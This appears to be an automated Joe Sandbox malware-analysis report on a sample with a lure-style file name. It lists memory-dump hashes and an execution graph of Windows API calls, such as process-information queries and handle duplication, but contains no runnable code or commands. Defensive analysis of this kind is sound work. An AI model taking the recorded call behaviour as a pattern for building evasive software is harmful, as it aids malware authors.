                                                                                                        • Instruction Fuzzy Hash: C221C274D0520ACFCB41EFA9D9486EEBBF4FF09310F10566AD809B6210EB355A95CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0cf968e845ce56c6c16ed8ab3382137703a7ad22715b57e21907e1399e275f0
                                                                                                        • Instruction ID: c91ba170c477e003a635de9f2b8d9c18988860909297fde6ed1d1574cbc0a475
                                                                                                        • Opcode Fuzzy Hash: b0cf968e845ce56c6c16ed8ab3382137703a7ad22715b57e21907e1399e275f0
                                                                                                        • Instruction Fuzzy Hash: FF110AB0D0010ADFDB44EFB9D68079EBBF2FB84704F109569D1589B369EB705A458F81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4130896351.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_111d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                        • Instruction ID: 872dba23a885069567c4dd5ecf8f82546de764eaecc6624bed0a17c1775b5960
                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                        • Instruction Fuzzy Hash: 4E11DD75504284CFDB16CF68D9C8B16FFA2FB84314F24C6AAD8494B256C33AD44ACF62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3e95cd12bc5c985c554e8985be8ce1d649c8a3a0d94acfde732909152c6c643
                                                                                                        • Instruction ID: a15e40ab268134ced5f3173fc0a7a5903a39868ab8907ff8b268d0ee06af5ed8
                                                                                                        • Opcode Fuzzy Hash: b3e95cd12bc5c985c554e8985be8ce1d649c8a3a0d94acfde732909152c6c643
                                                                                                        • Instruction Fuzzy Hash: B501D872B101196FDF159EA898107FF3FA7EBD8250F19C029F515D7284DE758D118B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ce54b9bb00cfee0607772f93bec6003c014d5551a6e13bf31b9d1c59ff66fe1a
                                                                                                        • Instruction ID: ace547381cbe967786c9ce01578fe3b1d8fe947348e459a16143e9b11b86b1b2
                                                                                                        • Opcode Fuzzy Hash: ce54b9bb00cfee0607772f93bec6003c014d5551a6e13bf31b9d1c59ff66fe1a
                                                                                                        • Instruction Fuzzy Hash: 2DF0F6313102215B9B165A2E9454A2EBADEEFC8A553054079EB09CBB61EE61CC03C780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d7d93ecf71a4d0a0718c6e229992923eb46136f4e848bd4b9e23f3db265a81f1
                                                                                                        • Instruction ID: 231cfd017b1dc504f540228a4921be998bd1b586cfe63f9199f5294ffddf3cd9
                                                                                                        • Opcode Fuzzy Hash: d7d93ecf71a4d0a0718c6e229992923eb46136f4e848bd4b9e23f3db265a81f1
                                                                                                        • Instruction Fuzzy Hash: A1014CB6D0020A9FDB40DFA8E840AEEBBB1FB48305F408426D924A3354D7345A56DF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d71e64b0c9b8291c99779a1cbfbb2589971e390d6b2cf9b768bf4f9ebcf84451
                                                                                                        • Instruction ID: 1428b39ce8d8940ae79ea65acce2f6f9a703e40898f714df10a79bb7a8275342
                                                                                                        • Opcode Fuzzy Hash: d71e64b0c9b8291c99779a1cbfbb2589971e390d6b2cf9b768bf4f9ebcf84451
                                                                                                        • Instruction Fuzzy Hash: 40E0C231E2012B96CB009FB0E8444EEF734EFD5365B414626D46436000EF30265AC6A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40302450c079fdbe49d7aa17274c92d3877c36d88314aa6dacbc659bfc2da007
                                                                                                        • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                        • Opcode Fuzzy Hash: 40302450c079fdbe49d7aa17274c92d3877c36d88314aa6dacbc659bfc2da007
                                                                                                        • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                        • Instruction ID: fcb8a843448708659d8bebbbdef9633d419110d7e64250a10c084c35321d8f7a
                                                                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                        • Instruction Fuzzy Hash: 8DC0123321C1383BA225104E7C41EABAB8DC2C12B4AA10137FB1C93241AC829C8001A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e905c21d1e5c1b6faacbb3790f4e672a43b713373dff75bac5d933ffbccb5ff4
                                                                                                        • Instruction ID: a0702a367468fd456fc213708f58c3c1bc590bb5fe16eaeee6e23135a62b6996
                                                                                                        • Opcode Fuzzy Hash: e905c21d1e5c1b6faacbb3790f4e672a43b713373dff75bac5d933ffbccb5ff4
                                                                                                        • Instruction Fuzzy Hash: 12D02B33C483414FCB06A3B0DC453987F31EB40218B05D630D0010929FDE74C84A8B00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3867bbbd4fafaecd1d9f7a01365d57275f00531196113b15b81a8701b3944d96
                                                                                                        • Instruction ID: 6fe3c2ba3c55d29d2ab872fae2662cb567a40d2e9747f0174b0e6eb6639ab98d
                                                                                                        • Opcode Fuzzy Hash: 3867bbbd4fafaecd1d9f7a01365d57275f00531196113b15b81a8701b3944d96
                                                                                                        • Instruction Fuzzy Hash: 4BD0E234E4000CCFCF20DFA8E4844DCBB70EB88321B10542AD825A7210D63054608F00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a322065f1989ab37216c9b671b4cd38db4a1303a1de51019cc081db53329b5ae
                                                                                                        • Instruction ID: de6fc5870e7a2729dfba59e4de045720fc9647e3547e896ac755829eed931d74
                                                                                                        • Opcode Fuzzy Hash: a322065f1989ab37216c9b671b4cd38db4a1303a1de51019cc081db53329b5ae
                                                                                                        • Instruction Fuzzy Hash: 51D0173AB40008DFCF008F88E8408DDF7B6FB98220B048116E911A3260C6319921CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9d6a8c122b17f6e9860733d239b2a311f8ff2b7e8384d477e8ffd708c70e8636
                                                                                                        • Instruction ID: ef5176c3bbd42dc3885976d4793f3bfafaafb3f1d8dbb4c07949f84e8cfbcdb8
                                                                                                        • Opcode Fuzzy Hash: 9d6a8c122b17f6e9860733d239b2a311f8ff2b7e8384d477e8ffd708c70e8636
                                                                                                        • Instruction Fuzzy Hash: FAC08031C843094FC905F7B5FD49759776EFAC060C740863090050A75DDFB4DC994790
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                        • API String ID: 0-3001612457
                                                                                                        • Opcode ID: b4b717de0cb85246b02628affec97f3f1621879a4806efe071c59f805d240191
                                                                                                        • Instruction ID: de05b0f41446a36651393edf69391eb6a16ea42917a93c1dd7c2c786ada9a5e6
                                                                                                        • Opcode Fuzzy Hash: b4b717de0cb85246b02628affec97f3f1621879a4806efe071c59f805d240191
                                                                                                        • Instruction Fuzzy Hash: A501D432760126EFCB248E2CC544AAD37EBAF88A607254469EA46CF3B5DE71DC418740

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:195
                                                                                                        Total number of Limit Nodes:7
                                                                                                        execution_graph 44745 521a351 44746 521a35b 44745->44746 44749 5219c24 44746->44749 44748 521a364 44750 5219c2f 44749->44750 44753 129aac0 44750->44753 44751 521ef84 44751->44748 44754 129aacb 44753->44754 44757 129aaf0 44754->44757 44756 129b10d 44756->44751 44759 129aafb 44757->44759 44758 129b881 44758->44756 44759->44758 44762 52100e9 44759->44762 44769 52100f8 44759->44769 44763 5210119 44762->44763 44764 521013d 44763->44764 44766 5210310 DuplicateHandle 44763->44766 44776 5210298 44763->44776 44781 52102a8 44763->44781 44786 5210301 44763->44786 44764->44758 44766->44764 44770 5210119 44769->44770 44771 521013d 44770->44771 44772 5210301 DuplicateHandle 44770->44772 44773 5210310 DuplicateHandle 44770->44773 44774 52102a8 CreateWindowExW 44770->44774 44775 5210298 CreateWindowExW 44770->44775 44771->44758 44772->44771 44773->44771 44774->44771 44775->44771 44777 52102a8 44776->44777 44778 52102ef 44777->44778 44791 5210fa4 44777->44791 44795 5210fb8 44777->44795 44778->44764 44783 52102b5 44781->44783 44782 52102ef 44782->44764 44783->44782 44784 5210fa4 CreateWindowExW 44783->44784 44785 5210fb8 CreateWindowExW 44783->44785 44784->44782 44785->44782 44787 5210320 44786->44787 44788 521033d 44787->44788 44789 52103b1 DuplicateHandle 44787->44789 44790 52103c0 DuplicateHandle 44787->44790 44788->44764 44789->44788 44790->44788 44792 5210fb8 44791->44792 44794 5211008 44792->44794 44799 52105f4 44792->44799 44794->44794 44796 5210fe0 44795->44796 44797 52105f4 CreateWindowExW 44796->44797 44798 5211008 44796->44798 44797->44798 44800 52105ff 44799->44800 44804 5212df0 44800->44804 44809 5212e08 44800->44809 44801 52110b1 44801->44794 44806 5212dff 44804->44806 44805 5212e45 44805->44801 44806->44805 44815 5213c60 44806->44815 44820 5213c53 44806->44820 44811 5212e39 44809->44811 44812 5212f39 44809->44812 44810 5212e45 44810->44801 44811->44810 44813 5213c60 CreateWindowExW 44811->44813 44814 5213c53 CreateWindowExW 44811->44814 44812->44801 44813->44812 44814->44812 44816 5213c8b 44815->44816 44817 5213d3a 44816->44817 44825 5214b40 44816->44825 44828 5214b33 44816->44828 44822 5213c60 44820->44822 44821 5213d3a 44821->44821 44822->44821 44823 5214b40 CreateWindowExW 44822->44823 44824 5214b33 CreateWindowExW 44822->44824 44823->44821 44824->44821 44826 52126a8 CreateWindowExW 44825->44826 44827 5214b75 44826->44827 44827->44817 44829 5214b40 44828->44829 44830 52126a8 CreateWindowExW 44829->44830 44831 5214b75 44830->44831 44831->44817 44832 129e218 44833 129e25a 44832->44833 44834 129e260 GetModuleHandleW 44832->44834 44833->44834 44835 129e28d 44834->44835 44654 52152f3 44658 5215328 44654->44658 44662 5215318 44654->44662 44655 5215306 44659 521533c 44658->44659 44661 5215358 44659->44661 44666 5210310 44659->44666 44661->44655 44663 521533c 44662->44663 44664 5210310 DuplicateHandle 44663->44664 44665 5215358 44663->44665 44664->44665 44665->44655 44667 5210320 44666->44667 44668 521033d 44667->44668 44671 52103b1 44667->44671 44676 52103c0 44667->44676 44668->44661 44672 52103c0 44671->44672 44681 52109a8 44672->44681 44684 5210998 44672->44684 44673 52104f3 44673->44668 44677 5210406 44676->44677 44679 52109a8 DuplicateHandle 44677->44679 44680 5210998 DuplicateHandle 44677->44680 44678 52104f3 44678->44668 44679->44678 44680->44678 44688 5210594 44681->44688 44685 52109a8 44684->44685 44686 5210594 DuplicateHandle 44685->44686 44687 52109d6 44686->44687 44687->44673 44689 5210a10 DuplicateHandle 44688->44689 44690 52109d6 44689->44690 44690->44673 44733 85abcf8 44736 85abcf9 44733->44736 44737 85ab914 44736->44737 44741 85ab920 44736->44741 44738 85ac638 OutputDebugStringW 44737->44738 44740 85ac6b7 44738->44740 44740->44736 44742 85ac6e8 CloseHandle 44741->44742 44744 85ac756 44742->44744 44744->44736 44836 124d0dc 44837 124d0f4 44836->44837 44838 124d14e 44837->44838 44843 52126d4 44837->44843 44852 5214d3b 44837->44852 44856 5214d48 44837->44856 44860 5215aa8 44837->44860 44844 52126df 44843->44844 44845 5215b19 44844->44845 44847 5215b09 44844->44847 44848 5215b17 44845->44848 44885 52127fc 44845->44885 44869 5215c40 44847->44869 44874 5215c3b 44847->44874 44879 5215d0c 44847->44879 44853 5214d48 44852->44853 44854 52126d4 CallWindowProcW 44853->44854 44855 5214d8f 44854->44855 44855->44838 44857 5214d6e 44856->44857 44858 52126d4 CallWindowProcW 44857->44858 44859 5214d8f 44858->44859 44859->44838 44861 5215ab8 44860->44861 44862 5215b19 44861->44862 44864 5215b09 44861->44864 44863 52127fc CallWindowProcW 44862->44863 44865 5215b17 44862->44865 44863->44865 44866 5215c40 CallWindowProcW 44864->44866 44867 5215c3b CallWindowProcW 44864->44867 44868 5215d0c CallWindowProcW 44864->44868 44866->44865 44867->44865 44868->44865 44870 5215c54 44869->44870 44889 5215ce8 44870->44889 44893 5215cf8 44870->44893 44871 5215ce0 44871->44848 44875 5215c40 44874->44875 44877 5215ce8 CallWindowProcW 44875->44877 44878 5215cf8 CallWindowProcW 44875->44878 44876 5215ce0 44876->44848 44877->44876 44878->44876 44880 5215cca 44879->44880 44881 5215d1a 44879->44881 44883 5215ce8 CallWindowProcW 44880->44883 44884 5215cf8 CallWindowProcW 44880->44884 44882 5215ce0 44882->44848 44883->44882 44884->44882 44886 5212807 44885->44886 44887 52171fa CallWindowProcW 44886->44887 44888 52171a9 44886->44888 44887->44888 44888->44848 44890 5215cf8 44889->44890 44891 5215d09 44890->44891 44896 5217131 44890->44896 44891->44871 44894 5215d09 44893->44894 44895 5217131 CallWindowProcW 44893->44895 44894->44871 44895->44894 44897 52127fc CallWindowProcW 44896->44897 44898 521714a 44897->44898 44898->44891 44691 1297f30 44692 1297f57 44691->44692 44693 1298034 44692->44693 44695 1296914 44692->44695 44696 1298fc0 CreateActCtxA 44695->44696 44698 1299083 44696->44698 44899 521e9d8 44900 5219c24 2 API calls 44899->44900 44901 521e9e5 44900->44901 44699 85a72c0 44700 85a72c1 44699->44700 44703 85aa070 44700->44703 44701 85a72dd 44704 85aa074 44703->44704 44708 85aafb8 44704->44708 44712 85aafa8 44704->44712 44705 85aa146 44705->44701 44709 85aafca 44708->44709 44716 85aafe8 44709->44716 44713 85aafca 44712->44713 44715 85aafe8 NtQueryInformationProcess 44713->44715 44714 85aafde 44714->44705 44715->44714 44717 85aafec 44716->44717 44721 85ab0b8 44717->44721 44725 85ab0c8 44717->44725 44718 85aafde 44718->44705 44722 85ab0bc 44721->44722 44729 85a7244 44722->44729 44726 85ab0c9 44725->44726 44727 85a7244 NtQueryInformationProcess 44726->44727 44728 85ab173 44727->44728 44728->44718 44730 85ab228 NtQueryInformationProcess 44729->44730 44732 85ab173 44730->44732 44732->44718
                                                                                                        APIs
                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 085AB2A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InformationProcessQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1778838933-0
                                                                                                        • Opcode ID: 5477318893e47d392e47b47a861c0da5c8205527d9a392debc101ec2353c3ce1
                                                                                                        • Instruction ID: 82626c74b2c8729a3703096e3096204a97a61e29c156d57a2a0df173c0462463
                                                                                                        • Opcode Fuzzy Hash: 5477318893e47d392e47b47a861c0da5c8205527d9a392debc101ec2353c3ce1
                                                                                                        • Instruction Fuzzy Hash: EA21D3B5901249DFCB10CF9AD884ADEFFF4BF48320F10852AE958A7211C375A554CFA5
                                                                                                        APIs
                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 085AB2A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InformationProcessQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1778838933-0
                                                                                                        • Opcode ID: f510f5f694d511752bfccbed296a367433de69b8fc94a5382b53a29110e4b270
                                                                                                        • Instruction ID: a82f473b258bae55b3604aaa998c2c1f1cb19d649bf81da0d5f670807c24ef4e
                                                                                                        • Opcode Fuzzy Hash: f510f5f694d511752bfccbed296a367433de69b8fc94a5382b53a29110e4b270
                                                                                                        • Instruction Fuzzy Hash: C321EDB5900249DFCB10CF9AD884ADEBBF4FF48320F10842AE918A7250D374A954CFA5
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05214CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: b8748de70466ee683c35b471f47c830630b09808626cfd53d592376d18024c62
                                                                                                        • Instruction ID: 2150f99eb8828c9e09a403f11c6029c01b242edde4a2d59f5aa5446277630eaa
                                                                                                        • Opcode Fuzzy Hash: b8748de70466ee683c35b471f47c830630b09808626cfd53d592376d18024c62
                                                                                                        • Instruction Fuzzy Hash: B451CFB1D103099FDF14DF99C984ADEBBF5BF48310F24812AE819AB210D775A885CF94
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05214CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: f2e5850dc85416a3382acb0da1292d73a02af8e43d77db3ccacecf1835eb7120
                                                                                                        • Instruction ID: 92263c05c9d82462c7b026686a2c4754eb9fe4fc641fc703cd01061d307a463b
                                                                                                        • Opcode Fuzzy Hash: f2e5850dc85416a3382acb0da1292d73a02af8e43d77db3ccacecf1835eb7120
                                                                                                        • Instruction Fuzzy Hash: D851CFB1D103099FDF14CFA9C884ADEBBF5BF48314F24812AE819AB210D771A885CF95
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05217221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: fe688fb5067d3431e2fc83a423129b001629b06a865f131d80809889b596222f
                                                                                                        • Instruction ID: a7f09a3932d9e22445e3993e1408a04f6f65cd1b2655e1258ee8c6becf62b8bc
                                                                                                        • Opcode Fuzzy Hash: fe688fb5067d3431e2fc83a423129b001629b06a865f131d80809889b596222f
                                                                                                        • Instruction Fuzzy Hash: 46412CB4910209CFCB14CF99C488AABBBF5FF98314F24C459E919AB321D774A841CFA4
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01299071
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1778431812.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_1290000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: c9f7a892ca4e2db36c2fa46b2b674413352b935720820e8d0522b83faf332f7f
                                                                                                        • Instruction ID: 5df9f857ed062fe7aa3dee4c2766919c37bd438eb04d599a6c67e5c581e413f7
                                                                                                        • Opcode Fuzzy Hash: c9f7a892ca4e2db36c2fa46b2b674413352b935720820e8d0522b83faf332f7f
                                                                                                        • Instruction Fuzzy Hash: AC41FFB0C00619CBDF24DFA9C884BDEBBF5BF49314F20806AD518AB255DBB56985CF90
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 91058a4f2ae62afaa0f828b7c9295efeba91fd193440fb60f5f017bd85c50d26
                                                                                                        • Instruction ID: 6da402b4a28bf521c468f730d8aa70029c88de1083ac8a42a11362ecc47154c2
                                                                                                        • Opcode Fuzzy Hash: 91058a4f2ae62afaa0f828b7c9295efeba91fd193440fb60f5f017bd85c50d26
                                                                                                        • Instruction Fuzzy Hash: 5B219CB18056998FCB01DFADC8946DEBFF4FF49320F14805AD454AB251D334A944CFA9
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052109D6,?,?,?,?,?), ref: 05210A97
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 248c239b9569650e662fed5d8b7b0e9bfa2ba0ab526332f1e7593c5636dce7e3
                                                                                                        • Instruction ID: 69720c48ff536a5bcbab7b7a8d811f2431b005e7d40bd48be3a39f4780420cff
                                                                                                        • Opcode Fuzzy Hash: 248c239b9569650e662fed5d8b7b0e9bfa2ba0ab526332f1e7593c5636dce7e3
                                                                                                        • Instruction Fuzzy Hash: B22103B5901209EFDB10CF9AD984ADEBBF4EB48310F10841AE958A3350D378A950CFA4
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052109D6,?,?,?,?,?), ref: 05210A97
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: d1ce78a290688a858e427f1086df4aefccc8502b1b627bafbd976a0e246a337e
                                                                                                        • Instruction ID: 28c05b14670cc08175131014f8c8189f9ae7b5cb73842d9e5cb893f84f891a5c
                                                                                                        • Opcode Fuzzy Hash: d1ce78a290688a858e427f1086df4aefccc8502b1b627bafbd976a0e246a337e
                                                                                                        • Instruction Fuzzy Hash: 9721E3B5901219EFDB10CFAAD984ADEBBF4FB48320F14841AE958A3250D374A944CFA5
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 76df3b1578658649db25fcf2e43fed193e5bc243b7a7cb3a75fee180a5180d2b
                                                                                                        • Instruction ID: a931aee04d5d7515c25d49c85d6e7f0f9dc50c67f47297a81466ef86d746d374
